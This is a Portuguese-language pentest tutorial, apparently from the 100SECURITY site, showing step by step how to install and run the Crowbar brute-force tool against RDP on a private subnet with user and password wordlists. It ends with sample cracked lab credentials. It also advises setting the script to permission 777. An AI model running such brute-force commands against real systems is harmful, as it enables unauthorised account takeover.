O CROWBAR é uma ferramenta de força bruta muito útil durante um PenTest, de acordo com os desenvolvedores seu diferencial esta na utilização de chaves SSH que para atacar outros servidores SSH.

Projeto : github.com/galkan/crowbar

01 - Passo

Baixe a versão mais atual utilizando o git.

Linux
git clone https://github.com/galkan/crowbar

02 - Passo

Entre no diretório crowbar e liste os arquivos.

Linux
cd crowbar

ls -l

03 - Passo

Crie um arquivo usuarios.txt e adicione alguns usuários que possivelmente possa existir nos equipamentos da rede.

Linux
vim usuarios.txt

04 - Passo

Crie um arquivo senha.txt e adicione algumas senhas que possivelmente possam ser dos usuários existentes nos equipamentos da rede.

Linux
vim senhas.txt

05 - Passo

Atribua a permissão 777 para o arquivo crowbar.py e visualize a permissão atribuída.

Linux
chmod 777 crowbar.py

ls -l

06 - Passo

Para que possa executar o crowbar.py algumas dependências são necessárias, basta instalar os pacotes a seguir:

Linux
apt-get install openvpn freerdp-x11 vncviewer

07 - Passo

Execute os crowbar seguido dos parâmetros abaixo para realizar o brute force.

Linux
./crowbar.py -b rdp -s 10.10.10.0/24 -U usuarios.txt -C senhas.txt -d

08 - Passo

Dois novos arquivos serão gerados:

crowbar.log : Contém todas as tentativas de Usuários/Senhas realizados nos equipamentos.
crowbar.out : Contém os Equipamentos munidos dos Usuários/Senhas obtidos.

Linux
ls -l

09 - Passo

Servidor: 10.10.10.20 – Usuário: Administrator – Senha: [email protected]

Servidor: 10.10.10.140 – Usuário: 100security – Senha: 123456



  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2020 - 100SECURITY

Contato